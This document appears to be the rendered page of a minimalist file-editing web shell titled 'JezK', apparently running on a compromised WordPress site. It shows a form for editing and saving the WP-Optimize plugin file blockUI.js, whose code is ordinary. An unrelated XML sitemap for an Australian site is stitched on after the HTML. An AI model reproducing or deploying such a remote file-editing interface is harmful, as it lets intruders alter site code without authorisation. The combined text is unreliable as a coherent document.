
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: blockUI.js</h2><form method="post"><textarea name="file_content" rows="10" cols="50">var wp_optimize = window.wp_optimize || {};

/**
 * Blocks UI
 *
 * @param {string} message Information to show in blockUI
 * @param {Object} options Display options
 * @param {integer} timeout (optional)
 * @param {boolean} is_popup_blocking_screen (optional) when is true then it is impossible to close the popup by clicking outside
 */
wp_optimize.block_ui = function (message, options, timeout, is_popup_blocking_screen) {

	var $ = jQuery,
	logo_src = (typeof wpoptimize !== &#039;undefined&#039; &amp;&amp; wpoptimize.logo_src) || (typeof wposmush !== &#039;undefined&#039; &amp;&amp; wposmush.logo_src),
		font_size = message.length &lt; 30 ? &#039;large&#039; : ( message.length &lt; 100 ? &#039;medium&#039; : &#039;small&#039;),
		params = {
			css: {
				width: &#039;300px&#039;,
				border: &#039;none&#039;,
				&#039;border-radius&#039;: &#039;10px&#039;,
				left: &#039;calc(50% - 150px)&#039;,
				padding: &#039;20px&#039;
			},
			message: &#039;&lt;div class=&quot;wp_optimize_blink_animation&quot;&gt;&lt;img src=&quot;&#039;+logo_src+&#039;&quot; height=&quot;80&quot; width=&quot;80&quot;&gt;&lt;div class=&quot;wp_optimize_blink_animation-message_text--&#039;+font_size+&#039;&quot;&gt;&#039;+message+&#039;&lt;/div&gt;&lt;/div&gt;&#039;
		};

	options = options || {};

	if (timeout) {
		setTimeout(jQuery.unblockUI, timeout);
	} else if (!is_popup_blocking_screen) {
		options.onOverlayClick = jQuery.unblockUI;
	}

	params = $.extend(params, options);

	$.blockUI(params);
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//astyleofshade.com.au/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://astyleofshade.com.au/post-sitemap.xml</loc>
		<lastmod>2026-09-12T02:12:46+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://astyleofshade.com.au/page-sitemap.xml</loc>
		<lastmod>2026-09-11T01:03:07+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->